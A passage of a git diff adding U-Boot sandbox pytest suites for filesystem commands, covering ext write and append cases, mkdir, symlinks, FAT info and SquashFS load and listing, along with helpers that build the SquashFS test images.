assert('filesize=0' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext7(self, u_boot_console, fs_obj_ext): + """ + Test Case 7 - write at the end (append) + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 7 - write at the end (append)'): + # Test Case 7a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w7 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/%s.w7 $filesize $filesize' + % (fs_type, ADDR, MIN_FILE)) + assert('20480 bytes written' in output) + + # Test Case 7b - Check size of written file + output = u_boot_console.run_command_list([ + '%ssize host 0:0 /dir1/%s.w7' % (fs_type, MIN_FILE), + 'printenv filesize', + 'setenv filesize']) + assert('filesize=a000' in ''.join(output)) + + # Test Case 7c - Check md5 of file content + output = u_boot_console.run_command_list([ + 'mw.b %x 00 100' % ADDR, + '%sload host 0:0 %x /dir1/%s.w7' % (fs_type, ADDR, MIN_FILE), + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[3] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext8(self, u_boot_console, fs_obj_ext): + """ + Test Case 8 - write at offset beyond the end of file + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 8 - write beyond the end'): + # Test Case 8a - Check if command expectedly failed + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w8 $filesize' + % (fs_type, ADDR, MIN_FILE)]) + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/%s.w8 0x1400 %x' + % (fs_type, ADDR, MIN_FILE, 0x100000 + 0x1400)) + assert('Unable to write file /dir1' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext9(self, u_boot_console, fs_obj_ext): + """ + Test Case 9 - write to a non-existing file at non-zero offset + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 9 - write to non-existing file with non-zero offset'): + # Test Case 9a - Check if command expectedly failed + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%sload host 0:0 %x /%s' % (fs_type, ADDR, MIN_FILE), + '%swrite host 0:0 %x /dir1/%s.w9 0x1400 0x1400' + % (fs_type, ADDR, MIN_FILE)]) + assert('Unable to write file /dir1' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext10(self, u_boot_console, fs_obj_ext): + """ + 'Test Case 10 - create/delete as many directories under root directory + as amount of directory entries goes beyond one cluster size)' + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 10 - create/delete (many)'): + # Test Case 10a - Create many files + # Please note that the size of directory entry is 32 bytes. + # So one typical cluster may holds 64 (2048/32) entries. + output = u_boot_console.run_command( + 'host bind 0 %s' % fs_img) + + for i in range(0, 66): + output = u_boot_console.run_command( + '%swrite host 0:0 %x /FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = u_boot_console.run_command('%sls host 0:0 /' % fs_type) + assert('FILE0123456789_00' in output) + assert('FILE0123456789_41' in output) + + # Test Case 10b - Delete many files + for i in range(0, 66): + output = u_boot_console.run_command( + '%srm host 0:0 /FILE0123456789_%02x' + % (fs_type, i)) + output = u_boot_console.run_command('%sls host 0:0 /' % fs_type) + assert(not 'FILE0123456789_00' in output) + assert(not 'FILE0123456789_41' in output) + + # Test Case 10c - Create many files again + # Please note no.64 and 65 are intentionally re-created + for i in range(64, 128): + output = u_boot_console.run_command( + '%swrite host 0:0 %x /FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = u_boot_console.run_command('%sls host 0:0 /' % fs_type) + assert('FILE0123456789_40' in output) + assert('FILE0123456789_79' in output) + + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext11(self, u_boot_console, fs_obj_ext): + """ + 'Test Case 11 - create/delete as many directories under non-root + directory as amount of directory entries goes beyond one cluster size)' + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 11 - create/delete (many)'): + # Test Case 11a - Create many files + # Please note that the size of directory entry is 32 bytes. + # So one typical cluster may holds 64 (2048/32) entries. + output = u_boot_console.run_command( + 'host bind 0 %s' % fs_img) + + for i in range(0, 66): + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = u_boot_console.run_command('%sls host 0:0 /dir1' % fs_type) + assert('FILE0123456789_00' in output) + assert('FILE0123456789_41' in output) + + # Test Case 11b - Delete many files + for i in range(0, 66): + output = u_boot_console.run_command( + '%srm host 0:0 /dir1/FILE0123456789_%02x' + % (fs_type, i)) + output = u_boot_console.run_command('%sls host 0:0 /dir1' % fs_type) + assert(not 'FILE0123456789_00' in output) + assert(not 'FILE0123456789_41' in output) + + # Test Case 11c - Create many files again + # Please note no.64 and 65 are intentionally re-created + for i in range(64, 128): + output = u_boot_console.run_command( + '%swrite host 0:0 %x /dir1/FILE0123456789_%02x 100' + % (fs_type, ADDR, i)) + output = u_boot_console.run_command('%sls host 0:0 /dir1' % fs_type) + assert('FILE0123456789_40' in output) + assert('FILE0123456789_79' in output) + + assert_fs_integrity(fs_type, fs_img) + + def test_fs_ext12(self, u_boot_console, fs_obj_ext): + """ + Test Case 12 - write plain and mangle file + """ + fs_type,fs_img,md5val = fs_obj_ext + with u_boot_console.log.section('Test Case 12 - write plain and mangle file'): + # Test Case 12a - Check if command successfully returned + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%swrite host 0:0 %x /%s 0' + % (fs_type, ADDR, PLAIN_FILE), + '%swrite host 0:0 %x /%s 0' + % (fs_type, ADDR, MANGLE_FILE)]) + assert('0 bytes written' in ''.join(output)) + # Test Case 12b - Read file system content + output = check_output('mdir -i %s' % fs_img, shell=True).decode() + # Test Case 12c - Check if short filename is not mangled + assert(str2fat(PLAIN_FILE) in ''.join(output)) + # Test Case 12d - Check if long filename is mangled + assert(str2fat(MANGLE_FILE) in ''.join(output)) + + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_fs_cmd.py b/test/py/tests/test_fs/test_fs_cmd.py new file mode 100644 index 00000000000..700cf3591de --- /dev/null +++ b/test/py/tests/test_fs/test_fs_cmd.py @@ -0,0 +1,13 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 +# Niel Fourie, DENX Software Engineering, lusus@denx.de + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_fstypes(u_boot_console): + """Test that `fstypes` prints a result which includes `sandbox`.""" + output = u_boot_console.run_command('fstypes') + assert "Supported filesystems:" in output + assert "sandbox" in output diff --git a/test/py/tests/test_fs/test_fs_fat.py b/test/py/tests/test_fs/test_fs_fat.py new file mode 100644 index 00000000000..4009d0b63a3 --- /dev/null +++ b/test/py/tests/test_fs/test_fs_fat.py @@ -0,0 +1,25 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2023 Weidmüller Interface GmbH & Co. KG +# Author: Christian Taedcke <christian.taedcke@weidmueller.com> +# +# U-Boot File System: FAT Test + +""" +This test verifies fat specific file system behaviour. +""" + +import pytest +import re + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestFsFat(object): + def test_fs_fat1(self, u_boot_console, fs_obj_fat): + """Test that `fstypes` prints a result which includes `sandbox`.""" + fs_type,fs_img = fs_obj_fat + with u_boot_console.log.section('Test Case 1 - fatinfo'): + # Test Case 1 - ls + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + 'fatinfo host 0:0']) + assert(re.search('Filesystem: %s' % fs_type.upper(), ''.join(output))) diff --git a/test/py/tests/test_fs/test_mkdir.py b/test/py/tests/test_fs/test_mkdir.py new file mode 100644 index 00000000000..fa9561ec359 --- /dev/null +++ b/test/py/tests/test_fs/test_mkdir.py @@ -0,0 +1,121 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> +# +# U-Boot File System:mkdir Test + +""" +This test verifies mkdir operation on file system. +""" + +import pytest +from fstest_helpers import assert_fs_integrity + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestMkdir(object): + def test_mkdir1(self, u_boot_console, fs_obj_mkdir): + """ + Test Case 1 - create a directory under a root + """ + fs_type,fs_img = fs_obj_mkdir + with u_boot_console.log.section('Test Case 1 - mkdir'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 dir1' % fs_type, + '%sls host 0:0 /' % fs_type]) + assert('dir1/' in ''.join(output)) + + output = u_boot_console.run_command( + '%sls host 0:0 dir1' % fs_type) + assert('./' in output) + assert('../' in output) + assert_fs_integrity(fs_type, fs_img) + + + def test_mkdir2(self, u_boot_console, fs_obj_mkdir): + """ + Test Case 2 - create a directory under a sub-directory + """ + fs_type,fs_img = fs_obj_mkdir + with u_boot_console.log.section('Test Case 2 - mkdir (sub-sub directory)'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 dir1/dir2' % fs_type, + '%sls host 0:0 dir1' % fs_type]) + assert('dir2/' in ''.join(output)) + + output = u_boot_console.run_command( + '%sls host 0:0 dir1/dir2' % fs_type) + assert('./' in output) + assert('../' in output) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir3(self, u_boot_console, fs_obj_mkdir): + """ + Test Case 3 - trying to create a directory with a non-existing + path should fail + """ + fs_type,fs_img = fs_obj_mkdir + with u_boot_console.log.section('Test Case 3 - mkdir (non-existing path)'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 none/dir3' % fs_type]) + assert('Unable to create a directory' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir4(self, u_boot_console, fs_obj_mkdir): + """ + Test Case 4 - trying to create "." should fail + """ + fs_type,fs_img = fs_obj_mkdir + with u_boot_console.log.section('Test Case 4 - mkdir (".")'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 .' % fs_type]) + assert('Unable to create a directory' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir5(self, u_boot_console, fs_obj_mkdir): + """ + Test Case 5 - trying to create ".." should fail + """ + fs_type,fs_img = fs_obj_mkdir + with u_boot_console.log.section('Test Case 5 - mkdir ("..")'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 ..' % fs_type]) + assert('Unable to create a directory' in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_mkdir6(self, u_boot_console, fs_obj_mkdir): + """ + 'Test Case 6 - create as many directories as amount of directory + entries goes beyond a cluster size)' + """ + fs_type,fs_img = fs_obj_mkdir + with u_boot_console.log.section('Test Case 6 - mkdir (create many)'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + '%smkdir host 0:0 dir6' % fs_type, + '%sls host 0:0 /' % fs_type]) + assert('dir6/' in ''.join(output)) + + for i in range(0, 20): + output = u_boot_console.run_command( + '%smkdir host 0:0 dir6/0123456789abcdef%02x' + % (fs_type, i)) + output = u_boot_console.run_command('%sls host 0:0 dir6' % fs_type) + assert('0123456789abcdef00/' in output) + assert('0123456789abcdef13/' in output) + + output = u_boot_console.run_command( + '%sls host 0:0 dir6/0123456789abcdef13/.' % fs_type) + assert('./' in output) + assert('../' in output) + + output = u_boot_console.run_command( + '%sls host 0:0 dir6/0123456789abcdef13/..' % fs_type) + assert('0123456789abcdef00/' in output) + assert('0123456789abcdef13/' in output) + assert_fs_integrity(fs_type, fs_img) diff --git a/test/py/tests/test_fs/test_squashfs/sqfs_common.py b/test/py/tests/test_fs/test_squashfs/sqfs_common.py new file mode 100644 index 00000000000..d1621dcce3a --- /dev/null +++ b/test/py/tests/test_fs/test_squashfs/sqfs_common.py @@ -0,0 +1,204 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Bootlin +# Author: Joao Marcos Costa <joaomarcos.costa@bootlin.com> + +import os +import shutil +import subprocess + +""" standard test images table: Each table item is a key:value pair +representing the output image name and its respective mksquashfs options. +This table should be modified only when adding support for new compression +algorithms. The 'default' case takes no options but the input and output +names, so it must be assigned with an empty string. +""" +STANDARD_TABLE = { + 'default' : '', + 'lzo_comp_frag' : '', + 'lzo_frag' : '', + 'lzo_no_frag' : '', + 'zstd_comp_frag' : '', + 'zstd_frag' : '', + 'zstd_no_frag' : '', + 'gzip_comp_frag' : '', + 'gzip_frag' : '', + 'gzip_no_frag' : '' +} + +""" EXTRA_TABLE: Set this table's keys and values if you want to make squashfs +images with your own customized options. +""" +EXTRA_TABLE = {} + +# path to source directory used to make squashfs test images +SQFS_SRC_DIR = 'sqfs_src_dir' + +def get_opts_list(): + """ Combines fragmentation and compression options into a list of strings. + + opts_list's firts item is an empty string as STANDARD_TABLE's first item is + the 'default' case. + + Returns: + A list of strings whose items are formed by a compression and a + fragmentation option joined by a whitespace. + """ + # supported compression options only + comp_opts = ['-comp lzo', '-comp zstd', '-comp gzip'] + # file fragmentation options + frag_opts = ['-always-use-fragments', '-always-use-fragments -noF', '-no-fragments'] + + opts_list = [' '] + for comp_opt in comp_opts: + for frag_opt in frag_opts: + opts_list.append(' '.join([comp_opt, frag_opt])) + + return opts_list + +def init_standard_table(): + """ Initializes STANDARD_TABLE values. + + STANDARD_TABLE's keys are pre-defined, and init_standard_table() assigns + the right value for each one of them. + """ + opts_list = get_opts_list() + + for key, value in zip(STANDARD_TABLE.keys(), opts_list): + STANDARD_TABLE[key] = value + +def generate_file(file_name, file_size): + """ Generates a file filled with 'x'. + + Args: + file_name: the file's name. + file_size: the content's length and therefore the file size. + """ + content = 'x' * file_size + + file = open(file_name, 'w') + file.write(content) + file.close() + +def generate_sqfs_src_dir(build_dir): + """ Generates the source directory used to make the SquashFS images. + + The source directory is generated at build_dir, and it has the following + structure: + sqfs_src_dir/ + ├── empty-dir/ + ├── f1000 + ├── f4096 + ├── f5096 + ├── subdir/ + │  └── subdir-file + └── sym -> subdir + + 3 directories, 4 files + + The files in the root dir. are prefixed with an 'f' followed by its size. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + + root = os.path.join(build_dir, SQFS_SRC_DIR) + # make root directory + os.makedirs(root) + + # 4096: minimum block size + file_name = 'f4096' + generate_file(os.path.join(root, file_name), 4096) + + # 5096: minimum block size + 1000 chars (fragment) + file_name = 'f5096' + generate_file(os.path.join(root, file_name), 5096) + + # 1000: less than minimum block size (fragment only) + file_name = 'f1000' + generate_file(os.path.join(root, file_name), 1000) + + # sub-directory with a single file inside + subdir_path = os.path.join(root, 'subdir') + os.makedirs(subdir_path) + generate_file(os.path.join(subdir_path, 'subdir-file'), 100) + + # symlink (target: sub-directory) + os.symlink('subdir', os.path.join(root, 'sym')) + + # empty directory + os.makedirs(os.path.join(root, 'empty-dir')) + +def mksquashfs(args): + """ Runs mksquashfs command. + + Args: + args: mksquashfs options (e.g.: compression and fragmentation). + """ + subprocess.run(['mksquashfs ' + args], shell=True, check=True, + stdout=subprocess.DEVNULL) + +def get_mksquashfs_version(): + """ Parses the output of mksquashfs -version. + + Returns: + mksquashfs's version as a float. + """ + out = subprocess.run(['mksquashfs -version'], shell=True, check=True, + capture_output=True, text=True) + # 'out' is: mksquashfs version X (yyyy/mm/dd) ... + return out.stdout.split()[2].split('.')[0:2] + +def check_mksquashfs_version(): + """ Checks if mksquashfs meets the required version. """ + + version = get_mksquashfs_version(); + if int(version[0]) < 4 or int(version[0]) == 4 and int(version[1]) < 4 : + print('Error: mksquashfs is too old, required version: 4.4') + raise AssertionError + +def make_all_images(build_dir): + """ Makes the SquashFS images used in the test suite. + + The image names and respective mksquashfs options are defined in STANDARD_TABLE + and EXTRA_TABLE. The destination is defined by 'build_dir'. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + + init_standard_table() + input_path = os.path.join(build_dir, SQFS_SRC_DIR) + + # make squashfs images according to STANDARD_TABLE + for out, opts in zip(STANDARD_TABLE.keys(), STANDARD_TABLE.values()): + output_path = os.path.join(build_dir, out) + mksquashfs(' '.join([input_path, output_path, opts])) + + # make squashfs images according to EXTRA_TABLE + for out, opts in zip(EXTRA_TABLE.keys(), EXTRA_TABLE.values()): + output_path = os.path.join(build_dir, out) + mksquashfs(' '.join([input_path, output_path, opts])) + +def clean_all_images(build_dir): + """ Deletes the SquashFS images at build_dir. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + + for image_name in STANDARD_TABLE: + image_path = os.path.join(build_dir, image_name) + os.remove(image_path) + + for image_name in EXTRA_TABLE: + image_path = os.path.join(build_dir, image_name) + os.remove(image_path) + +def clean_sqfs_src_dir(build_dir): + """ Deletes the source directory at build_dir. + + Args: + build_dir: u-boot's build-sandbox directory. + """ + path = os.path.join(build_dir, SQFS_SRC_DIR) + shutil.rmtree(path) diff --git a/test/py/tests/test_fs/test_squashfs/test_sqfs_load.py b/test/py/tests/test_fs/test_squashfs/test_sqfs_load.py new file mode 100644 index 00000000000..6ec6ccec6c9 --- /dev/null +++ b/test/py/tests/test_fs/test_squashfs/test_sqfs_load.py @@ -0,0 +1,154 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Bootlin +# Author: Joao Marcos Costa <joaomarcos.costa@bootlin.com> + +import os +import subprocess +import pytest + +from sqfs_common import SQFS_SRC_DIR, STANDARD_TABLE +from sqfs_common import generate_sqfs_src_dir, make_all_images +from sqfs_common import clean_sqfs_src_dir, clean_all_images +from sqfs_common import check_mksquashfs_version + +@pytest.mark.requiredtool('md5sum') +def original_md5sum(path): + """ Runs md5sum command. + + Args: + path: path to original file. + Returns: + The original file's checksum as a string. + """ + + out = subprocess.run(['md5sum ' + path], shell=True, check=True, + capture_output=True, text=True) + checksum = out.stdout.split()[0] + + return checksum + +def uboot_md5sum(u_boot_console, address, count): + """ Runs U-Boot's md5sum command. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + address: address where the file was loaded (e.g.: $kernel_addr_r). + count: file's size. It was named 'count' to match md5sum's respective + argument name. + Returns: + The checksum of the file loaded with sqfsload as a string. + """ + + out = u_boot_console.run_command('md5sum {} {}'.format(address, count)) + checksum = out.split()[-1] + + return checksum + +def sqfs_load_files(u_boot_console, files, sizes, address): + """ Loads files and asserts their checksums. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + files: list of files to be loaded. + sizes: the sizes of each file. + address: the address where the files should be loaded. + """ + build_dir = u_boot_console.config.build_dir + for (file, size) in zip(files, sizes): + out = u_boot_console.run_command('sqfsload host 0 {} {}'.format(address, file)) + + # check if the right amount of bytes was read + assert size in out + + # compare original file's checksum against u-boot's + u_boot_checksum = uboot_md5sum(u_boot_console, address, hex(int(size))) + original_file_path = os.path.join(build_dir, SQFS_SRC_DIR + '/' + file) + original_checksum = original_md5sum(original_file_path) + assert u_boot_checksum == original_checksum + +def sqfs_load_files_at_root(u_boot_console): + """ Calls sqfs_load_files passing the files at the SquashFS image's root. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + + files = ['f4096', 'f5096', 'f1000'] + sizes = ['4096', '5096', '1000'] + address = '$kernel_addr_r' + sqfs_load_files(u_boot_console, files, sizes, address) + +def sqfs_load_files_at_subdir(u_boot_console): + """ Calls sqfs_load_files passing the files at the SquashFS image's subdir. + + This test checks if the path resolution works, since the file is not at the + root directory. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + files = ['subdir/subdir-file'] + sizes = ['100'] + address = '$kernel_addr_r' + sqfs_load_files(u_boot_console, files, sizes, address) + +def sqfs_load_non_existent_file(u_boot_console): + """ Calls sqfs_load_files passing an non-existent file to raise an error. + + This test checks if the SquashFS support won't crash if it doesn't find the + specified file. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + address = '$kernel_addr_r' + file = 'non-existent' + out = u_boot_console.run_command('sqfsload host 0 {} {}'.format(address, file)) + assert 'Failed to load' in out + +def sqfs_run_all_load_tests(u_boot_console): + """ Runs all the previously defined test cases. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + sqfs_load_files_at_root(u_boot_console) + sqfs_load_files_at_subdir(u_boot_console) + sqfs_load_non_existent_file(u_boot_console) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +@pytest.mark.buildconfigspec('cmd_squashfs') +@pytest.mark.buildconfigspec('fs_squashfs') +@pytest.mark.requiredtool('mksquashfs') +def test_sqfs_load(u_boot_console): + """ Executes the sqfsload test suite. + + First, it generates the SquashFS images, then it runs the test cases and + finally cleans the workspace. If an exception is raised, the workspace is + cleaned before exiting. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + build_dir = u_boot_console.config.build_dir + + # setup test environment + check_mksquashfs_version() + generate_sqfs_src_dir(build_dir) + make_all_images(build_dir) + + # run all tests for each image + for image in STANDARD_TABLE: + try: + image_path = os.path.join(build_dir, image) + u_boot_console.run_command('host bind 0 {}'.format(image_path)) + sqfs_run_all_load_tests(u_boot_console) + except: + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) + raise AssertionError + + # clean test environment + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) diff --git a/test/py/tests/test_fs/test_squashfs/test_sqfs_ls.py b/test/py/tests/test_fs/test_squashfs/test_sqfs_ls.py new file mode 100644 index 00000000000..a20a7d1a663 --- /dev/null +++ b/test/py/tests/test_fs/test_squashfs/test_sqfs_ls.py @@ -0,0 +1,148 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Bootlin +# Author: Joao Marcos Costa <joaomarcos.costa@bootlin.com> + +import os +import pytest + +from sqfs_common import STANDARD_TABLE +from sqfs_common import generate_sqfs_src_dir, make_all_images +from sqfs_common import clean_sqfs_src_dir, clean_all_images +from sqfs_common import check_mksquashfs_version + +def sqfs_ls_at_root(u_boot_console): + """ Runs sqfsls at image's root. + + This test checks if all the present files and directories were listed. Also, + it checks if passing the slash or not changes the output, which it shouldn't. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + + no_slash = u_boot_console.run_command('sqfsls host 0') + slash = u_boot_console.run_command('sqfsls host 0 /') + assert no_slash == slash + + expected_lines = ['empty-dir/', '1000 f1000', '4096 f4096', '5096 f5096', + 'subdir/', '<SYM> sym', '4 file(s), 2 dir(s)'] + + output = u_boot_console.run_command('sqfsls host 0') + for line in expected_lines: + assert line in output + +def sqfs_ls_at_empty_dir(u_boot_console): + """ Runs sqfsls at an empty directory. + + This tests checks if sqfsls will print anything other than the 'Empty directory' + message. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + assert u_boot_console.run_command('sqfsls host 0 empty-dir') == 'Empty directory.' + +def sqfs_ls_at_subdir(u_boot_console): + """ Runs sqfsls at the SquashFS image's subdir. + + This test checks if the path resolution works, since the directory is not the + root. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + expected_lines = ['100 subdir-file', '1 file(s), 0 dir(s)'] + output = u_boot_console.run_command('sqfsls host 0 subdir') + for line in expected_lines: + assert line in output + +def sqfs_ls_at_symlink(u_boot_console): + """ Runs sqfsls at a SquashFS image's symbolic link. + + This test checks if the symbolic link's target resolution works. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + # since sym -> subdir, the following outputs must be equal + output = u_boot_console.run_command('sqfsls host 0 sym') + output_subdir = u_boot_console.run_command('sqfsls host 0 subdir') + assert output == output_subdir + + expected_lines = ['100 subdir-file', '1 file(s), 0 dir(s)'] + for line in expected_lines: + assert line in output + +def sqfs_ls_at_non_existent_dir(u_boot_console): + """ Runs sqfsls at a file and at a non-existent directory. + + This test checks if the SquashFS support won't crash if it doesn't find the + specified directory or if it takes a file as an input instead of an actual + directory. In both cases, the output should be the same. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + out_non_existent = u_boot_console.run_command('sqfsls host 0 fff') + out_not_dir = u_boot_console.run_command('sqfsls host 0 f1000') + assert out_non_existent == out_not_dir + assert '** Cannot find directory. **' in out_non_existent + +def sqfs_run_all_ls_tests(u_boot_console): + """ Runs all the previously defined test cases. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + sqfs_ls_at_root(u_boot_console) + sqfs_ls_at_empty_dir(u_boot_console) + sqfs_ls_at_subdir(u_boot_console) + sqfs_ls_at_symlink(u_boot_console) + sqfs_ls_at_non_existent_dir(u_boot_console) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_fs_generic') +@pytest.mark.buildconfigspec('cmd_squashfs') +@pytest.mark.buildconfigspec('fs_squashfs') +@pytest.mark.requiredtool('mksquashfs') +@pytest.mark.singlethread +def test_sqfs_ls(u_boot_console): + """ Executes the sqfsls test suite. + + First, it generates the SquashFS images, then it runs the test cases and + finally cleans the workspace. If an exception is raised, the workspace is + cleaned before exiting. + + Args: + u_boot_console: provides the means to interact with U-Boot's console. + """ + build_dir = u_boot_console.config.build_dir + + # If the EFI subsystem is enabled and initialized, EFI subsystem tries to + # add EFI boot option when the new disk is detected. If there is no EFI + # System Partition exists, EFI subsystem outputs error messages and + # it ends up with test failure. + # Restart U-Boot to clear the previous state. + # TODO: Ideally EFI test cases need to be fixed, but it will + # increase the number of system reset. + u_boot_console.restart_uboot() + + # setup test environment + check_mksquashfs_version() + generate_sqfs_src_dir(build_dir) + make_all_images(build_dir) + + # run all tests for each image + for image in STANDARD_TABLE: + try: + image_path = os.path.join(build_dir, image) + u_boot_console.run_command('host bind 0 {}'.format(image_path)) + sqfs_run_all_ls_tests(u_boot_console) + except: + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) + raise AssertionError + + # clean test environment + clean_all_images(build_dir) + clean_sqfs_src_dir(build_dir) diff --git a/test/py/tests/test_fs/test_symlink.py b/test/py/tests/test_fs/test_symlink.py new file mode 100644 index 00000000000..9ced101a294 --- /dev/null +++ b/test/py/tests/test_fs/test_symlink.py @@ -0,0 +1,130 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2019, Texas Instrument +# Author: Jean-Jacques Hiblot <jjhiblot@ti.com> +# +# U-Boot File System:symlink Test + +""" +This test verifies unlink operation (deleting a file or a directory) +on file system. +""" + +import pytest +import re +from fstest_defs import * +from fstest_helpers import assert_fs_integrity + + +@pytest.mark.boardspec('sandbox') +@pytest.mark.slow +class TestSymlink(object): + def test_symlink1(self, u_boot_console, fs_obj_symlink): + """ + Test Case 1 - create a link. and follow it when reading + """ + fs_type, fs_img, md5val = fs_obj_symlink + with u_boot_console.log.section('Test Case 1 - create link and read'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'ln host 0:0 %s /%s.link ' % (SMALL_FILE, SMALL_FILE), + ]) + assert('' in ''.join(output)) + + output = u_boot_console.run_command_list([ + '%sload host 0:0 %x /%s.link' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 4b - Read full 1MB of small file + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_symlink2(self, u_boot_console, fs_obj_symlink): + """ + Test Case 2 - create chained links + """ + fs_type, fs_img, md5val = fs_obj_symlink + with u_boot_console.log.section('Test Case 2 - create chained links'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'ln host 0:0 %s /%s.link1 ' % (SMALL_FILE, SMALL_FILE), + 'ln host 0:0 /%s.link1 /SUBDIR/%s.link2' % ( + SMALL_FILE, SMALL_FILE), + 'ln host 0:0 SUBDIR/%s.link2 /%s.link3' % ( + SMALL_FILE, SMALL_FILE), + ]) + assert('' in ''.join(output)) + + output = u_boot_console.run_command_list([ + '%sload host 0:0 %x /%s.link3' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=100000' in ''.join(output)) + + # Test Case 4b - Read full 1MB of small file + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[0] in ''.join(output)) + assert_fs_integrity(fs_type, fs_img) + + def test_symlink3(self, u_boot_console, fs_obj_symlink): + """ + Test Case 3 - replace file/link with link + """ + fs_type, fs_img, md5val = fs_obj_symlink + with u_boot_console.log.section('Test Case 1 - create link and read'): + output = u_boot_console.run_command_list([ + 'host bind 0 %s' % fs_img, + 'setenv filesize', + 'ln host 0:0 %s /%s ' % (MEDIUM_FILE, SMALL_FILE), + 'ln host 0:0 %s /%s.link ' % (MEDIUM_FILE, MEDIUM_FILE), + ]) + assert('' in ''.join(output)) + + output = u_boot_console.run_command_list([ + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=a00000' in ''.join(output)) + + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(md5val[1] in ''.join(output)) + + output = u_boot_console.run_command_list([ + 'ln host 0:0 %s.link /%s ' % (MEDIUM_FILE, SMALL_FILE), + '%sload host 0:0 %x /%s' % (fs_type, ADDR, SMALL_FILE), + 'printenv filesize']) + assert('filesize=a00000' in ''.join(output)) + + output = u_boot_console.run_command_list([ + 'md5sum %x 